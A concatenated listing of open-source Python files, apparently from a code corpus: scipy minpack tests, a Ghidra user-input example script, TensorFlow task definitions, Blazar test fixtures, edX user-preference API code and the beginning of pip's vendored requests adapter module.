| apache-2.0 |
Javiercerna/MissionPlanner | Lib/site-packages/scipy/optimize/tests/test_minpack.py | 55 | 9863 | """
Unit tests for optimization routines from minpack.py.
"""
from numpy.testing import assert_, assert_almost_equal, assert_array_equal, \
assert_array_almost_equal, TestCase, run_module_suite, assert_raises
import numpy as np
from numpy import array, float64
from scipy import optimize
from scipy.optimize.minpack import leastsq, curve_fit, fixed_point
class ReturnShape(object):
"""This class exists to create a callable that does not have a 'func_name' attribute.
__init__ takes the argument 'shape', which should be a tuple of ints. When an instance
it called with a single argument 'x', it returns numpy.ones(shape).
"""
def __init__(self, shape):
self.shape = shape
def __call__(self, x):
return np.ones(self.shape)
def dummy_func(x, shape):
"""A function that returns an array of ones of the given shape.
`x` is ignored.
"""
return np.ones(shape)
class TestFSolve(object):
def pressure_network(self, flow_rates, Qtot, k):
"""Evaluate non-linear equation system representing
the pressures and flows in a system of n parallel pipes::
f_i = P_i - P_0, for i = 1..n
f_0 = sum(Q_i) - Qtot
Where Q_i is the flow rate in pipe i and P_i the pressure in that pipe.
Pressure is modeled as a P=kQ**2 where k is a valve coefficient and
Q is the flow rate.
Parameters
----------
flow_rates : float
A 1D array of n flow rates [kg/s].
k : float
A 1D array of n valve coefficients [1/kg m].
Qtot : float
A scalar, the total input flow rate [kg/s].
Returns
-------
F : float
A 1D array, F[i] == f_i.
"""
P = k * flow_rates**2
F = np.hstack((P[1:] - P[0], flow_rates.sum() - Qtot))
return F
def pressure_network_jacobian(self, flow_rates, Qtot, k):
"""Return the jacobian of the equation system F(flow_rates)
computed by `pressure_network` with respect to
*flow_rates*. See `pressure_network` for the detailed
description of parrameters.
Returns
-------
jac : float
*n* by *n* matrix ``df_i/dQ_i`` where ``n = len(flow_rates)``
and *f_i* and *Q_i* are described in the doc for `pressure_network`
"""
n = len(flow_rates)
pdiff = np.diag(flow_rates[1:] * 2 * k[1:] - 2 * flow_rates[0] * k[0])
jac = np.empty((n, n))
jac[:n-1, :n-1] = pdiff
jac[:n-1, n-1] = 0
jac[n-1, :] = np.ones(n)
return jac
def test_pressure_network_no_gradient(self):
"""fsolve without gradient, equal pipes -> equal flows"""
k = np.ones(4) * 0.5
Qtot = 4
initial_guess = array([2., 0., 2., 0.])
final_flows = optimize.fsolve(
self.pressure_network, initial_guess, args=(Qtot, k))
assert_array_almost_equal(final_flows, np.ones(4))
def test_pressure_network_with_gradient(self):
"""fsolve with gradient, equal pipes -> equal flows"""
k = np.ones(4) * 0.5
Qtot = 4
initial_guess = array([2., 0., 2., 0.])
final_flows = optimize.fsolve(
self.pressure_network, initial_guess, args=(Qtot, k),
fprime=self.pressure_network_jacobian)
assert_array_almost_equal(final_flows, np.ones(4))
def test_wrong_shape_func_callable(self):
"""The callable 'func' has no 'func_name' attribute."""
func = ReturnShape(1)
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.fsolve, func, x0)
def test_wrong_shape_func_function(self):
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.fsolve, dummy_func, x0, args=((1,),))
def test_wrong_shape_fprime_callable(self):
"""The callables 'func' and 'deriv_func' have no 'func_name' attribute."""
func = ReturnShape(1)
deriv_func = ReturnShape((2,2))
assert_raises(TypeError, optimize.fsolve, func, x0=[0,1], fprime=deriv_func)
def test_wrong_shape_fprime_function(self):
func = lambda x: dummy_func(x, (2,))
deriv_func = lambda x: dummy_func(x, (3,3))
assert_raises(TypeError, optimize.fsolve, func, x0=[0,1], fprime=deriv_func)
class TestLeastSq(TestCase):
def setUp(self):
x = np.linspace(0, 10, 40)
a,b,c = 3.1, 42, -304.2
self.x = x
self.abc = a,b,c
y_true = a*x**2 + b*x + c
np.random.seed(0)
self.y_meas = y_true + 0.01*np.random.standard_normal(y_true.shape)
def residuals(self, p, y, x):
a,b,c = p
err = y-(a*x**2 + b*x + c)
return err
def test_basic(self):
p0 = array([0,0,0])
params_fit, ier = leastsq(self.residuals, p0,
args=(self.y_meas, self.x))
assert_(ier in (1,2,3,4), 'solution not found (ier=%d)'%ier)
# low precision due to random
assert_array_almost_equal(params_fit, self.abc, decimal=2)
def test_full_output(self):
p0 = array([0,0,0])
full_output = leastsq(self.residuals, p0,
args=(self.y_meas, self.x),
full_output=True)
params_fit, cov_x, infodict, mesg, ier = full_output
assert_(ier in (1,2,3,4), 'solution not found: %s'%mesg)
def test_input_untouched(self):
p0 = array([0,0,0],dtype=float64)
p0_copy = array(p0, copy=True)
full_output = leastsq(self.residuals, p0,
args=(self.y_meas, self.x),
full_output=True)
params_fit, cov_x, infodict, mesg, ier = full_output
assert_(ier in (1,2,3,4), 'solution not found: %s'%mesg)
assert_array_equal(p0, p0_copy)
def test_wrong_shape_func_callable(self):
"""The callable 'func' has no 'func_name' attribute."""
func = ReturnShape(1)
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.leastsq, func, x0)
def test_wrong_shape_func_function(self):
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.leastsq, dummy_func, x0, args=((1,),))
def test_wrong_shape_Dfun_callable(self):
"""The callables 'func' and 'deriv_func' have no 'func_name' attribute."""
func = ReturnShape(1)
deriv_func = ReturnShape((2,2))
assert_raises(TypeError, optimize.leastsq, func, x0=[0,1], Dfun=deriv_func)
def test_wrong_shape_Dfun_function(self):
func = lambda x: dummy_func(x, (2,))
deriv_func = lambda x: dummy_func(x, (3,3))
assert_raises(TypeError, optimize.leastsq, func, x0=[0,1], Dfun=deriv_func)
class TestCurveFit(TestCase):
def setUp(self):
self.y = array([1.0, 3.2, 9.5, 13.7])
self.x = array([1.0, 2.0, 3.0, 4.0])
def test_one_argument(self):
def func(x,a):
return x**a
popt, pcov = curve_fit(func, self.x, self.y)
assert_(len(popt) == 1)
assert_(pcov.shape == (1,1))
assert_almost_equal(popt[0], 1.9149, decimal=4)
assert_almost_equal(pcov[0,0], 0.0016, decimal=4)
def test_two_argument(self):
def func(x, a, b):
return b*x**a
popt, pcov = curve_fit(func, self.x, self.y)
assert_(len(popt) == 2)
assert_(pcov.shape == (2,2))
assert_array_almost_equal(popt, [1.7989, 1.1642], decimal=4)
assert_array_almost_equal(pcov, [[0.0852, -0.1260],[-0.1260, 0.1912]], decimal=4)
class TestFixedPoint(TestCase):
def test_scalar_trivial(self):
"""f(x) = 2x; fixed point should be x=0"""
def func(x):
return 2.0*x
x0 = 1.0
x = fixed_point(func, x0)
assert_almost_equal(x, 0.0)
def test_scalar_basic1(self):
"""f(x) = x**2; x0=1.05; fixed point should be x=1"""
def func(x):
return x**2
x0 = 1.05
x = fixed_point(func, x0)
assert_almost_equal(x, 1.0)
def test_scalar_basic2(self):
"""f(x) = x**0.5; x0=1.05; fixed point should be x=1"""
def func(x):
return x**0.5
x0 = 1.05
x = fixed_point(func, x0)
assert_almost_equal(x, 1.0)
def test_array_trivial(self):
def func(x):
return 2.0*x
x0 = [0.3, 0.15]
olderr = np.seterr(all='ignore')
try:
x = fixed_point(func, x0)
finally:
np.seterr(**olderr)
assert_almost_equal(x, [0.0, 0.0])
def test_array_basic1(self):
"""f(x) = c * x**2; fixed point should be x=1/c"""
def func(x, c):
return c * x**2
c = array([0.75, 1.0, 1.25])
x0 = [1.1, 1.15, 0.9]
olderr = np.seterr(all='ignore')
try:
x = fixed_point(func, x0, args=(c,))
finally:
np.seterr(**olderr)
assert_almost_equal(x, 1.0/c)
def test_array_basic2(self):
"""f(x) = c * x**0.5; fixed point should be x=c**2"""
def func(x, c):
return c * x**0.5
c = array([0.75, 1.0, 1.25])
x0 = [0.8, 1.1, 1.1]
x = fixed_point(func, x0, args=(c,))
assert_almost_equal(x, c**2)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
NationalSecurityAgency/ghidra | Ghidra/Features/Python/ghidra_scripts/AskScriptPy.py | 1 | 4185 | ## ###
# IP: GHIDRA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# An example of asking for user input.
# Note the ability to pre-populate values for some of these variables when AskScript.properties file exists.
# Also notice how the previous input is saved.
# DISCLAIMER: This is a recreation of a Java Ghidra script for example
# use only. Please run the Java version in a production environment.
#@category Examples.Python
from ghidra.framework.model import DomainFile
from ghidra.framework.model import DomainFolder
from ghidra.program.model.address import Address
from ghidra.program.model.lang import LanguageCompilerSpecPair
from ghidra.program.model.listing import Program
from ghidra.util import Msg
from java.lang import IllegalArgumentException
# The presence of the AskScript.properties file in the same location (as AskScript.java)
# allows for the following behavior:
# - GUI: if applicable, auto-populates the input field with the value in the
# .properties file (the first time that input field appears)
# - Headless: uses the value in the .properties file for the variable assigned to the
# corresponding askXxx() method in the GhidraScript.
try:
file1 = askFile("FILE", "Choose file:")
print "file was: " + str(file1)
directory1 = askDirectory("Directory", "Choose directory:")
print "directory was: " + str(directory1)
lang = askLanguage("Language Picker", "I want this one!")
print "language was: " + lang.toString()
domFolder = askProjectFolder("Please pick a domain folder!")
print "domFolder was: " + domFolder.getName()
int1 = askInt("integer 1", "enter integer 1")
int2 = askInt("integer 2", "enter integer 2")
print "int1 + int2 = " + str(int1 + int2)
long1 = askLong("long 1", "enter long 1")
long2 = askLong("long 2", "enter long 2")
print "long1 + long2 = " + str(long1 + long2)
address1 = askAddress("address 1", "enter address 1")
address2 = askAddress("address 2", "enter address 2")
print "address1 + address2 = " + address1.add(address2.getOffset()).toString()
#bytes = askBytes("bytes", "enter byte pattern")
#for b in bytes:
# print "b = " + str(b & 0xff)
prog = askProgram("Please choose a program to open.")
print "Program picked: " + prog.getName()
domFile = askDomainFile("Which domain file would you like?")
print "Domain file: " + domFile.getName()
d1 = askDouble("double 1", "enter double 1")
d2 = askDouble("double 2", "enter double 2")
print "d1 + d2 = " + str(d1 + d2)
myStr = askString("String Specification", "Please type a string: ")
myOtherStr = askString("Another String Specification", "Please type another string: ", "replace me!")
print "You typed: " + myStr + " and " + myOtherStr
choice = askChoice("Choice", "Please choose one", [ "grumpy", "dopey", "sleepy", "doc", "bashful" ], "bashful")
print "Choice? " + choice
choices1 = askChoices("Choices 1", "Please choose one or more numbers.", [ 1, 2, 3, 4, 5, 6 ])
print "Choices 1: "
for intChoice in choices1:
print str(intChoice) + " "
print ""
choices2 = askChoices("Choices 2", "Please choose one or more of the following.",
[ 1.1, 2.2, 3.3, 4.4, 5.5, 6.6 ], ["Part 1", "Part 2", "Part 3", "Part 4", "Part 5", "Part 6" ])
print "Choices 2: "
for intChoice in choices2:
print str(intChoice) + " "
print ""
yesOrNo = askYesNo("yes or no", "is this a yes/no question?")
print "Yes or No? " + str(yesOrNo)
except IllegalArgumentException as error:
Msg.warn(self, "Error during headless processing: " + error.toString())
| apache-2.0 |
derekjchow/models | research/cvt_text/task_specific/task_definitions.py | 5 | 2961 | # Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Defines all the tasks the model can learn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from base import embeddings
from task_specific.word_level import depparse_module
from task_specific.word_level import depparse_scorer
from task_specific.word_level import tagging_module
from task_specific.word_level import tagging_scorers
from task_specific.word_level import word_level_data
class Task(object):
__metaclass__ = abc.ABCMeta
def __init__(self, config, name, loader):
self.config = config
self.name = name
self.loader = loader
self.train_set = self.loader.get_dataset("train")
self.val_set = self.loader.get_dataset("dev" if config.dev_set else "test")
@abc.abstractmethod
def get_module(self, inputs, encoder):
pass
@abc.abstractmethod
def get_scorer(self):
pass
class Tagging(Task):
def __init__(self, config, name, is_token_level=True):
super(Tagging, self).__init__(
config, name, word_level_data.TaggedDataLoader(
config, name, is_token_level))
self.n_classes = len(set(self.loader.label_mapping.values()))
self.is_token_level = is_token_level
def get_module(self, inputs, encoder):
return tagging_module.TaggingModule(
self.config, self.name, self.n_classes, inputs, encoder)
def get_scorer(self):
if self.is_token_level:
return tagging_scorers.AccuracyScorer()
else:
return tagging_scorers.EntityLevelF1Scorer(self.loader.label_mapping)
class DependencyParsing(Tagging):
def __init__(self, config, name):
super(DependencyParsing, self).__init__(config, name, True)
def get_module(self, inputs, encoder):
return depparse_module.DepparseModule(
self.config, self.name, self.n_classes, inputs, encoder)
def get_scorer(self):
return depparse_scorer.DepparseScorer(
self.n_classes, (embeddings.get_punctuation_ids(self.config)))
def get_task(config, name):
if name in ["ccg", "pos"]:
return Tagging(config, name, True)
elif name in ["chunk", "ner", "er"]:
return Tagging(config, name, False)
elif name == "depparse":
return DependencyParsing(config, name)
else:
raise ValueError("Unknown task", name)
| apache-2.0 |
openstack/blazar | blazar/tests/__init__.py | 3 | 2729 | # Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fixtures
import tempfile
import testscenarios
from oslo_config import cfg
from oslo_log import log as logging
from oslotest import base
from blazar import context
from blazar.db.sqlalchemy import api as db_api
from blazar.db.sqlalchemy import facade_wrapper
cfg.CONF.set_override('use_stderr', False)
logging.setup(cfg.CONF, 'blazar')
_DB_CACHE = None
class Database(fixtures.Fixture):
def setUp(self):
super(Database, self).setUp()
fd = tempfile.NamedTemporaryFile(delete=False)
self.db_path = fd.name
database_connection = 'sqlite:///' + self.db_path
cfg.CONF.set_override('connection', str(database_connection),
group='database')
facade_wrapper._clear_engine()
self.engine = facade_wrapper.get_engine()
db_api.setup_db()
self.addCleanup(db_api.drop_db)
class TestCase(testscenarios.WithScenarios, base.BaseTestCase):
"""Test case base class for all unit tests.
Due to the slowness of DB access, this class is not supporting DB tests.
If needed, please herit from DBTestCase instead.
"""
def setUp(self):
"""Run before each test method to initialize test environment."""
super(TestCase, self).setUp()
self.context_mock = None
cfg.CONF(args=[], project='blazar')
def patch(self, obj, attr):
"""Returns a Mocked object on the patched attribute."""
mockfixture = self.useFixture(fixtures.MockPatchObject(obj, attr))
return mockfixture.mock
def set_context(self, ctx):
if self.context_mock is None:
self.context_mock = self.patch(context.BlazarContext, 'current')
self.context_mock.return_value = ctx
class DBTestCase(TestCase):
"""Test case base class for all database unit tests.
`DBTestCase` differs from TestCase in that DB access is supported.
Only tests needing DB support should herit from this class.
"""
def setUp(self):
super(DBTestCase, self).setUp()
global _DB_CACHE
if not _DB_CACHE:
_DB_CACHE = Database()
self.useFixture(_DB_CACHE)
| apache-2.0 |
playm2mboy/edx-platform | openedx/core/djangoapps/user_api/preferences/api.py | 3 | 16995 | """
API for managing user preferences.
"""
import logging
import analytics
from eventtracking import tracker
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from student.models import User, UserProfile
from request_cache import get_request_or_stub
from ..errors import (
UserAPIInternalError, UserAPIRequestError, UserNotFound, UserNotAuthorized,
PreferenceValidationError, PreferenceUpdateError
)
from ..helpers import intercept_errors
from ..models import UserOrgTag, UserPreference
from ..serializers import UserSerializer, RawUserPreferenceSerializer
log = logging.getLogger(__name__)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def get_user_preference(requesting_user, preference_key, username=None):
"""Returns the value of the user preference with the specified key.
Args:
requesting_user (User): The user requesting the user preferences. Only the user with username
`username` or users with "is_staff" privileges can access the preferences.
preference_key (str): The key for the user preference.
username (str): Optional username for which to look up the preferences. If not specified,
`requesting_user.username` is assumed.
Returns:
The value for the user preference which is always a string, or None if a preference
has not been specified.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to the user preference.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username, allow_staff=True)
return UserPreference.get_value(existing_user, preference_key)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def get_user_preferences(requesting_user, username=None):
"""Returns all user preferences as a JSON response.
Args:
requesting_user (User): The user requesting the user preferences. Only the user with username
`username` or users with "is_staff" privileges can access the preferences.
username (str): Optional username for which to look up the preferences. If not specified,
`requesting_user.username` is assumed.
Returns:
A dict containing account fields.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to the user preference.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username, allow_staff=True)
# Django Rest Framework V3 uses the current request to version
# hyperlinked URLS, so we need to retrieve the request and pass
# it in the serializer's context (otherwise we get an AssertionError).
# We're retrieving the request from the cache rather than passing it in
# as an argument because this is an implementation detail of how we're
# serializing data, which we want to encapsulate in the API call.
context = {
"request": get_request_or_stub()
}
user_serializer = UserSerializer(existing_user, context=context)
return user_serializer.data["preferences"]
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def update_user_preferences(requesting_user, update, username=None):
"""Update the user preferences for the given username.
Note:
It is up to the caller of this method to enforce the contract that this method is only called
with the user who made the request.
Arguments:
requesting_user (User): The user requesting to modify account information. Only the user with username
'username' has permissions to modify account information.
update (dict): The updated account field values.
Some notes:
Values are expected to be strings. Non-string values will be converted to strings.
Null values for a preference will be treated as a request to delete the key in question.
username (str): Optional username specifying which account should be updated. If not specified,
`requesting_user.username` is assumed.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to change the account
associated with `username`
PreferenceValidationError: the update was not attempted because validation errors were found
PreferenceUpdateError: the operation failed when performing the update.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username)
# First validate each preference setting
errors = {}
serializers = {}
for preference_key in update.keys():
preference_value = update[preference_key]
if preference_value is not None:
try:
serializer = create_user_preference_serializer(existing_user, preference_key, preference_value)
validate_user_preference_serializer(serializer, preference_key, preference_value)
serializers[preference_key] = serializer
except PreferenceValidationError as error:
preference_error = error.preference_errors[preference_key]
errors[preference_key] = {
"developer_message": preference_error["developer_message"],
"user_message": preference_error["user_message"],
}
if errors:
raise PreferenceValidationError(errors)
# Then perform the patch
for preference_key in update.keys():
preference_value = update[preference_key]
if preference_value is not None:
try:
serializer = serializers[preference_key]
serializer.save()
except Exception as error:
raise _create_preference_update_error(preference_key, preference_value, error)
else:
delete_user_preference(requesting_user, preference_key)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def set_user_preference(requesting_user, preference_key, preference_value, username=None):
"""Update a user preference for the given username.
Note:
It is up to the caller of this method to enforce the contract that this method is only called
with the user who made the request.
Arguments:
requesting_user (User): The user requesting to modify account information. Only the user with username
'username' has permissions to modify account information.
preference_key (str): The key for the user preference.
preference_value (str): The value to be stored. Non-string values will be converted to strings.
username (str): Optional username specifying which account should be updated. If not specified,
`requesting_user.username` is assumed.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to change the account
associated with `username`
PreferenceValidationError: the update was not attempted because validation errors were found
PreferenceUpdateError: the operation failed when performing the update.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username)
serializer = create_user_preference_serializer(existing_user, preference_key, preference_value)
validate_user_preference_serializer(serializer, preference_key, preference_value)
try:
serializer.save()
except Exception as error:
raise _create_preference_update_error(preference_key, preference_value, error)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def delete_user_preference(requesting_user, preference_key, username=None):
"""Deletes a user preference on behalf of a requesting user.
Note:
It is up to the caller of this method to enforce the contract that this method is only called
with the user who made the request.
Arguments:
requesting_user (User): The user requesting to delete the preference. Only the user with username
'username' has permissions to delete their own preference.
preference_key (str): The key for the user preference.
username (str): Optional username specifying which account should be updated. If not specified,
`requesting_user.username` is assumed.
Returns:
True if the preference was deleted, False if the user did not have a preference with the supplied key.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to change the account
associated with `username`
PreferenceUpdateError: the operation failed when performing the update.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username)
try:
user_preference = UserPreference.objects.get(user=existing_user, key=preference_key)
except ObjectDoesNotExist:
return False
try:
user_preference.delete()
except Exception as error:
raise PreferenceUpdateError(
developer_message=u"Delete failed for user preference '{preference_key}': {error}".format(
preference_key=preference_key, error=error
),
user_message=_(u"Delete failed for user preference '{preference_key}'.").format(
preference_key=preference_key
),
)
return True
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def update_email_opt_in(user, org, opt_in):
"""Updates a user's preference for receiving org-wide emails.
Sets a User Org Tag defining the choice to opt in or opt out of organization-wide
emails.
Arguments:
user (User): The user to set a preference for.
org (str): The org is used to determine the organization this setting is related to.
opt_in (bool): True if the user is choosing to receive emails for this organization.
If the user requires parental consent then email-optin is set to False regardless.
Returns:
None
Raises:
UserNotFound: no user profile exists for the specified user.
"""
preference, _ = UserOrgTag.objects.get_or_create(
user=user, org=org, key='email-optin'
)
# If the user requires parental consent, then don't allow opt-in
try:
user_profile = UserProfile.objects.get(user=user)
except ObjectDoesNotExist:
raise UserNotFound()
if user_profile.requires_parental_consent(
age_limit=getattr(settings, 'EMAIL_OPTIN_MINIMUM_AGE', 13),
default_requires_consent=False,
):
opt_in = False
# Update the preference and save it
preference.value = str(opt_in)
try:
preference.save()
if settings.SEGMENT_KEY:
_track_update_email_opt_in(user.id, org, opt_in)
except IntegrityError as err:
log.warn(u"Could not update organization wide preference due to IntegrityError: {}".format(err.message))
def _track_update_email_opt_in(user_id, organization, opt_in):
"""Track an email opt-in preference change.
Arguments:
user_id (str): The ID of the user making the preference change.
organization (str): The organization whose emails are being opted into or out of by the user.
opt_in (bool): Whether the user has chosen to opt-in to emails from the organization.
Returns:
None
"""
event_name = 'edx.bi.user.org_email.opted_in' if opt_in else 'edx.bi.user.org_email.opted_out'
tracking_context = tracker.get_tracker().resolve_context()
analytics.track(
user_id,
event_name,
{
'category': 'communication',
'label': organization
},
context={
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
)
def _get_user(requesting_user, username=None, allow_staff=False):
"""
Helper method to return the user for a given username.
If username is not provided, requesting_user.username is assumed.
"""
if username is None:
username = requesting_user.username
try:
existing_user = User.objects.get(username=username)
except ObjectDoesNotExist:
raise UserNotFound()
if requesting_user.username != username:
if not requesting_user.is_staff or not allow_staff:
raise UserNotAuthorized()
return existing_user
def create_user_preference_serializer(user, preference_key, preference_value):
"""Creates a serializer for the specified user preference.
Arguments:
user (User): The user whose preference is being serialized.
preference_key (str): The key for the user preference.
preference_value (str): The value to be stored. Non-string values will be converted to strings.
Returns:
A serializer that can be used to save the user preference.
"""
try:
existing_user_preference = UserPreference.objects.get(user=user, key=preference_key)
except ObjectDoesNotExist:
existing_user_preference = None
new_data = {
"user": user.id,
"key": preference_key,
"value": preference_value,
}
if existing_user_preference:
serializer = RawUserPreferenceSerializer(existing_user_preference, data=new_data)
else:
serializer = RawUserPreferenceSerializer(data=new_data)
return serializer
def validate_user_preference_serializer(serializer, preference_key, preference_value):
"""Validates a user preference serializer.
Arguments:
serializer (UserPreferenceSerializer): The serializer to be validated.
preference_key (str): The key for the user preference.
preference_value (str): The value to be stored. Non-string values will be converted to strings.
Raises:
PreferenceValidationError: the supplied key and/or value for a user preference are invalid.
"""
if preference_value is None or unicode(preference_value).strip() == '':
format_string = ugettext_noop(u"Preference '{preference_key}' cannot be set to an empty value.")
raise PreferenceValidationError({
preference_key: {
"developer_message": format_string.format(preference_key=preference_key),
"user_message": _(format_string).format(preference_key=preference_key)
}
})
if not serializer.is_valid():
developer_message = u"Value '{preference_value}' not valid for preference '{preference_key}': {error}".format(
preference_key=preference_key, preference_value=preference_value, error=serializer.errors
)
if "key" in serializer.errors:
user_message = _(u"Invalid user preference key '{preference_key}'.").format(
preference_key=preference_key
)
else:
user_message = _(u"Value '{preference_value}' is not valid for user preference '{preference_key}'.").format(
preference_key=preference_key, preference_value=preference_value
)
raise PreferenceValidationError({
preference_key: {
"developer_message": developer_message,
"user_message": user_message,
}
})
def _create_preference_update_error(preference_key, preference_value, error):
""" Creates a PreferenceUpdateError with developer_message and user_message. """
return PreferenceUpdateError(
developer_message=u"Save failed for user preference '{key}' with value '{value}': {error}".format(
key=preference_key, value=preference_value, error=error
),
user_message=_(u"Save failed for user preference '{key}' with value '{value}'.").format(
key=preference_key, value=preference_value
),
)
| agpl-3.0 |
perlygatekeeper/glowing-robot | Little_Alchemy_2/Scraper_python/env/lib/python3.7/site-packages/pip/_vendor/requests/adapters.py | 54 | 21548 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import os.path
import socket
from pip._vendor.urllib3.poolmanager import PoolManager, proxy_from_url
from pip._vendor.urllib3.response import HTTPResponse
from pip._vendor.urllib3.util import parse_url
from pip._vendor.urllib3.util import Timeout as TimeoutSauce
from pip._vendor.urllib3.util.retry import Retry
from pip._vendor.urllib3.exceptions import ClosedPoolError
from pip._vendor.urllib3.exceptions import ConnectTimeoutError
from pip._vendor.urllib3.exceptions import HTTPError as _HTTPError
from pip._vendor.urllib3.exceptions import MaxRetryError
from pip._vendor.urllib3.exceptions import NewConnectionError
from pip._vendor.urllib3.exceptions import ProxyError as _ProxyError
from pip._vendor.urllib3.exceptions import ProtocolError
from pip._vendor.urllib3.exceptions import ReadTimeoutError
from pip._vendor.urllib3.exceptions import SSLError as _SSLError
from pip._vendor.urllib3.exceptions import ResponseError
from pip._vendor.urllib3.exceptions import LocationValueError
from .models import Response
from .compat import urlparse, basestring
from .utils import (DEFAULT_CA_BUNDLE_PATH, extract_zipped_paths,
get_encoding_from_headers, prepend_scheme_if_needed,
get_auth_from_url, urldefragauth, select_proxy)
from .structures import CaseInsensitiveDict
from .cookies import extract_cookies_to_jar
from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
ProxyError, RetryError, InvalidSchema, InvalidProxyURL,
InvalidURL)
from .auth import _basic_auth_str
try:
from pip._vendor.urllib3.contrib.socks import SOCKSProxyManager
except ImportError:
def SOCKSProxyManager(*args, **kwargs):
raise InvalidSchema("Missing dependencies for SOCKS support.")
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
DEFAULT_POOL_TIMEOUT = None
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self, request, stream=False, timeout=None, verify=True,
cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple
:param verify: (optional) Either a boolean, in which case it controls whether we verify
the server's TLS certificate, or a string, in which case it must be a path
to a CA bundle to use
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
raise NotImplementedError
def close(self):
"""Cleans up adapter specific items."""
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed DNS lookups, socket
connections and connection timeouts, never to requests where data has
made it to the server. By default, Requests does not retry failed
connections. If you need granular control over the conditions under
which we retry a request, import urllib3's ``Retry`` class and pass
that instead.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
if max_retries == DEFAULT_RETRIES:
self.max_retries = Retry(0, read=False)
else:
self.max_retries = Retry.from_int(max_retries)
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
